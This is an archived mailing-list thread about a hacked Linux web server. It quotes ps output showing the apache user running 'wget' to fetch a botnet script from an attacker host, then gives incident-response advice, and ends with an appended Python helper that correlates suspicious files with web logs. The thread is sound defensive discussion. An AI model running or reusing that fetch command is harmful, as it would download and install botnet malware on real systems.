The following is an archive of a post made to our 'vox-tech mailing list' by one of its subscribers.

Re: [vox-tech] lugod.org cracked?

2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.

You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have.

You will want to find all setUID scripts/apps on the system and check
/etc/password for new accounts.

It would be a good idea to track the time of the event to the files with
the earliest creation stamp. Look for any files owned by apache user or
group on the system which are not where they should be (most will be in
publicly writable spaces like /tmp /var/tmp /usr/tmp, etc).

Associate the creation time of these files with entries in your web server
logs.... you may not be able to find an error with the correct time if a
service/daemon faulted before it could write a log entry.

Is lugod.org running a file integrity checker?

Inspect all php files for modification and trojans that may have been left.

You may have a cache of videos/music/stuff left behind too.

You don't know what other rootkits may have been used. Even init could
have been trojaned. It is also possible for modules to be loaded and
hidden from listing/view.

Check everything. If that is too much work, backup to tape, clean install,
and only move files over that have been sanitized.


ME said:
> Most common trojan/exploit is for irc relays.
> Guess for entry? Did you upgrade php and apache after those security holes
> were found a while back?
> could you send me a copy of the binary files you have found in
> /tmp/.image? (Thanks.)
> -ME
> Rod Roark said:
>> I found that something was sucking up all my bandwidth late
>> this morning.  ps -aux showed this:
>> apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c
>> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
>> apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget
>> leblocks.sytes.net/botnet
>> apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep
>> abcdeee
>> After killing all processes owned by apache and doing a bit
>> of checking around, I found these perl scripts in
>> /tmp/.images:
>> -rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1
>> They are definitely malicious.  Does anyone know what this
>> malware is?
>> -- Rod
>> _______________________________________________
>> vox-tech mailing list
>> vox-tech@lists.lugod.org
>> http://lists.lugod.org/mailman/listinfo/vox-tech
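As an added, defender-side illustration of the triage steps described in the reply above (this is not code from the thread or from LUGOD): given a constructed file listing and constructed Apache combined-format log lines, it flags files owned by the web-server user that sit outside the expected web directories, then pulls the log entries within a few minutes of each suspect file's modification time so they can be read together. EXPECTED_PREFIXES, the timezone and all sample data are assumptions made for the example.

```python
"""Triage helper: unexpected apache-owned files + nearby web-log entries."""
import re
from datetime import datetime, timedelta, timezone

# Apache combined log: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed: directories where files owned by the web-server user belong.
EXPECTED_PREFIXES = ("/var/www/", "/var/log/httpd/", "/var/cache/httpd/")

PST = timezone(timedelta(hours=-8))  # assumed server timezone

# Constructed sample data, loosely modelled on the thread's listing.
SAMPLE_FILES = [  # (path, owner, mtime)
    ("/tmp/.images/botnet", "apache", datetime(2005, 2, 15, 11, 14, tzinfo=PST)),
    ("/var/www/html/index.php", "apache", datetime(2005, 1, 3, 8, 0, tzinfo=PST)),
]
SAMPLE_LOG = [  # constructed access-log lines
    '10.0.0.5 - - [15/Feb/2005:09:02:11 -0800] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [15/Feb/2005:11:13:52 -0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [15/Feb/2005:11:14:07 -0800] "GET /gallery.php?id=1 HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
]


def parse_log_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, ts, request, status, _size = m.groups()
    return {"host": host, "time": datetime.strptime(ts, TIME_FMT),
            "request": request, "status": int(status)}


def unexpected_owner_files(files, owner="apache"):
    """Paths owned by the web user that are outside the expected directories."""
    return [p for p, o, _ in files if o == owner and not p.startswith(EXPECTED_PREFIXES)]


def correlate(files, log_lines, window_minutes=5):
    """Map each file path to log entries within +/- window of its mtime.

    Caveat: mtime is what the filesystem reports and can be altered after the
    fact, so treat a match as a lead to read, not as proof of the entry point.
    """
    entries = [e for e in map(parse_log_line, log_lines) if e]
    window = timedelta(minutes=window_minutes)
    return {path: [e for e in entries if abs(e["time"] - mtime) <= window]
            for path, _, mtime in files}
```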
